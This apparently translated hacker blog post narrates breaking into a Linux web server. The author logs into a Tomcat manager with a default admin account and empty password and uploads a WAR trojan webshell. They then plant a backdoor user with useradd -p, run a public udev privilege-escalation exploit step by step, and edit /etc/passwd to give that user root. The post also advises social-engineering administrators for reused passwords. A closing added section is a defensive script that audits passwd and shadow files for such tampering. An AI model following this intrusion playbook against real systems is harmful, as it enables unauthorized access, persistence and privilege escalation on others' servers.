Got a Linux box through udev today, and it was so easy. I didn't expect my luck to be this good......
Today I was testing a website with ay520, but the site was locked down so tightly that I couldn't find any vulnerabilities, so I switched to a roundabout attack. What is a roundabout attack? Let me explain:
When we attack a website whose source code structure we don't know, and which has none of the common vulnerabilities, we can first pick out some characteristic strings from the site's pages and then use Google to search for other websites built from the same source code. The sites we find won't necessarily have vulnerabilities either, but they may have configuration problems; exploit those, and once a shell is obtained we can use it to read the website's source code and then go back to the target site and attack it with what we learned. That is what I call a detour. It can also mean social-engineering the target site's administrator on another website or forum to get the username and password they registered there, then going back to the target site, at which point the target site is yours. Enough of that, let's get on with today's infiltration......
Because the target site had no vulnerabilities and no configuration problems either, I used Google to find a website with the same source code, http://www.xxx.com:9999/wcm/loginpage.htm, and tried the common passwords there. I found no weak password or other vulnerabilities, so I removed wcm and everything after it and went straight to http://www.xxx.com:9999/, which turned out to be Tomcat. The username and password I tested: admin with an empty password.
I uploaded a war Trojan and got a webshell on the roundabout-attack site. Running the command uname -a gave the server's kernel version:
Linux www.xxx.com 2.6.18-128.el5 #1 SMP Wed Jan 21 10:44:23 EST 2009 i686 i686 i386 GNU/Linux
A Linux 2.6 kernel, which has the udev local overflow vulnerability. First I checked what permissions the webshell runs with, using the command id. The result:
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=user_u:system_r:unconfined_t
So the webshell is running with root permissions. Since we have root, we can use the webshell to create a user, then connect with putty and run the local overflow to escalate privileges...... However, a user added with a plain useradd username has a blank password. If we want to set it with passwd username, the webshell cannot type the password interactively, which was frustrating, so I searched for its -p parameter and ran the following command:
useradd -p '$1$Bj.BPMBM$pr3Vte2A9DW6jCzljcZNT1' liang // the string after -p is the password hash of a user I added on my own virtual machine; I copied that hash to use as the password here, which let me add the user liang.
Then open putty, enter the username and password, and connect; everything is OK. The prompt is $, so this is an ordinary user. Next, use the udev overflow to escalate privileges.
I first tried the overflow from this article, http://www.waitalone.cn/post/466.html, but it failed; after checking, it may be a problem with that copy of the overflow code, so I opened
http://www.milw0rm.com/exploits/8478 directly and ran the following commands in putty:
[liang@www ~]$ vi test // paste the code from above
:wq // save and exit
[liang@www ~]$ chmod 777 test // give any user execute permission
[liang@www ~]$ ps ax | grep udev | grep -v grep | awk '{print $1}' // gets the udev process number; the result is 479, and 479 minus 1 is the parameter for test
[liang@www ~]$ sh test 478 // returns the result
sh-3.2$ // this returned prompt means it failed; we will try it several times
sh-3.2$ sh test 478 // I tried three times and still couldn't
sh-3.2$ sh test 476 // succeeded this time; I saw the cute #. Haha, my luck exploded.
Then vi /etc/passwd and change the uid and gid of the user liang to 0, so liang now has root permissions, haha. Work done!
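The two account changes in this post (a user planted with useradd -p, then given uid and gid 0 in /etc/passwd) both leave traces that an administrator can check for. Below is an added audit script, not part of the original post, that flags them; it takes the file contents as strings so it also runs against a backup or a mounted image, and the passwd/shadow samples are constructed, not copied from any real host.

```python
# Added example (not from the original post): audit /etc/passwd and /etc/shadow
# text for the account tampering described above. Inputs are file contents, not
# paths, so the function can run on a backup or a forensic image. Samples are
# constructed; the hashes in them are placeholders, not real digests.
from typing import Dict, List

PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat5:/sbin/nologin
liang:x:0:0::/home/liang:/bin/bash
"""

SHADOW_SAMPLE = """\
root:$6$constructedsalt$constructedhash:14000:0:99999:7:::
bin:*:14000:0:99999:7:::
tomcat:!!:14000:0:99999:7:::
liang:$1$constructed$md5cryptplaceholder:14000:0:99999:7:::
guest::14000:0:99999:7:::
"""


def audit_accounts(passwd_text: str, shadow_text: str) -> List[Dict[str, str]]:
    """Return one finding dict per suspicious entry, in file order."""
    findings: List[Dict[str, str]] = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append({"user": line, "issue": "malformed passwd entry"})
            continue
        name, uid, gid = fields[0], fields[2], fields[3]
        # The post ends by editing liang's uid and gid to 0; only root should have either.
        if name != "root" and "0" in (uid, gid):
            findings.append({"user": name, "issue": "uid/gid 0 on a non-root account"})
    for line in shadow_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            findings.append({"user": line, "issue": "malformed shadow entry"})
            continue
        name, pw_hash = fields[0], fields[1]
        if pw_hash == "":
            findings.append({"user": name, "issue": "empty hash, login needs no password"})
        elif pw_hash.startswith("$1$"):
            # $1$ is the MD5-crypt format of the hash planted with useradd -p above;
            # a lone $1$ entry among $5$/$6$ ones deserves a look at who created it.
            findings.append({"user": name, "issue": "MD5-crypt ($1$) hash, check who set it"})
    return findings


if __name__ == "__main__":
    for f in audit_accounts(PASSWD_SAMPLE, SHADOW_SAMPLE):
        print(f"{f['user']}: {f['issue']}")
```

Locked entries such as `!!` or `*` are deliberately not reported, since they cannot be used to log in.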